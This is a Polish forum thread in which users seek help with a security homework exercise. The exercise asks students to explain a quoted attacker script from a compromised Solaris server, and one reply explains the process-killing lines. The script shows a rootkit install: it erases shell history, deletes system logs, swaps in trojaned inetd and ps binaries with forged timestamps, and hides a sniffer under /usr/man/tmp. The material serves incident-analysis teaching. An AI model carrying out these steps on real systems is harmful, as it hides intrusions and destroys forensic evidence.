pomoc zadaniem, Log Analysis

0

Hej, mam takie zadanie i potrzebuje rozwiazania.
Bede wdzieczny za okazana pomoc.

You are the Chief Security Officer of PayByMobile Inc., a company which provides online pay services.
It is monday morning and you are just trying to get your first cup of coffee to start the day when Bill, your server farm admin calls you and reports unusual behavior on some of the Solaris machines. When he was working on the console he got messages that inetd could not bind to ports 21 and 23. When he examined the processes that were running he found that three instances of inetd were running. This was not supposed to be, so he killed two of them. Then he checked the other Solaris systems and found two more with the same problems.

You start searching the machines and find an unknown file n00b.tar. The file contained the following other files: act, temp, ps and update. You open the act file and find it to be a script, that could tell you what was done to your systems. You find the script below.

Please answer the following questions:

  1. Try to reconstruct what the attacker was doing and explain every line of the script! (refer to the line numbers)
  2. Which files are changed in the system and which of those files is likely to be a backdoor?
  3. Given that the program update is a sniffer, where did the attacker hide the program and its log file? Why do you think the attacker has chosen this location?
1 unset HISTFILE; unset SAVEHIST
2 cp temp /usr/sbin/inetd;
3 chown root /usr/sbin/inetd;
4 chgrp root /usr/sbin/inetd;
5 touch 0716000097 /usr/sbin/inetd;
6 rm -rf temp /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb*
7 rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec*
8 /usr/sbin/inetd -s;
9 /usr/sbin/inetd -s;
10 telnet localhost;
11 /usr/sbin/inetd -s;
12 ps -ef | grep inetd | grep bob |awk '{print "kill -9 " $2 }' > boo
13 chmod 700 boo
14 ./boo
15 ps -ef | grep nfs | grep statd |awk '{print "kill -9 " $2 }' > boo
16 chmod 700 boo
17 ./boo
18 ps -ef | grep ttdb | grep -v grep |awk '{print "kill -9 " $2 }' > boo
19 chmod 700 boo
20 ./boo
21 rm -rf boo
22 mkdir /usr/man/tmp
23 mv update ps /usr/man/tmp
24 cd /usr/man/tmp
25 echo 1 \"./update -s -o output\" > /kernel/pssys
26 chmod 755 ps update
27 ./update -s -o output &
28 cp ps /usr/ucb/ps
29 mv ps /usr/bin/ps
30 touch 0716000097 /usr/bin/ps /usr/ucb/ps
31 cd /
32 ps -ef | grep bob | grep -v grep
33 ps -ef | grep stat | grep -v grep
34 ps -ef | grep update 
0

Hej,

napisze mi ktops co sie dzieje w linijkach :

12 ps -ef | grep inetd | grep bob |awk '{print "kill -9 " $2 }' > boo
13 chmod 700 boo
14 ./boo
15 ps -ef | grep nfs | grep statd |awk '{print "kill -9 " $2 }' > boo
16 chmod 700 boo
17 ./boo
18 ps -ef | grep ttdb | grep -v grep |awk '{print "kill -9 " $2 }' > boo

oraz:

25 echo 1 \"./update -s -o output\" > /kernel/pssys
26 chmod 755 ps update
27 ./update -s -o output &
28 cp ps /usr/ucb/ps
29 mv ps /usr/bin/ps
30 touch 0716000097 /usr/bin/ps /usr/ucb/ps
31 cd /
32 ps -ef | grep bob | grep -v grep
33 ps -ef | grep stat | grep -v grep
34 ps -ef | grep update

Potzrebuje tego do jutra i bardzo bede wdzieczna za pomoc,

kris_kat

0

a nie mozesz po prostu odpalić i sprawdzić?
12 listujesz procesy a następnie wyciągasz z tej listy takie zawierające inetd oraz bob i wyniki zapisujesz do pliku w postaci
kill -9 X
gdzie X jest pidem kolejnych wyników ps

13 nadanie uprawienia 700 dla tego pliku (czyli można go wykonać)
14 wykonanie kodu z pliku (czyli ubicie tych procesów)

(15,16,17) i (18,19,20) to samo co wyzej ale inne procesy

Zresztą w ogóle co to za pytania. Podstawowa znajomość konsoli, awk i grepa wystarczy zeby to przeanalizować. To jest godzina nauki, do jutra masz jeszcze sporo czasu.

1 użytkowników online, w tym zalogowanych: 0, gości: 1, botów: 0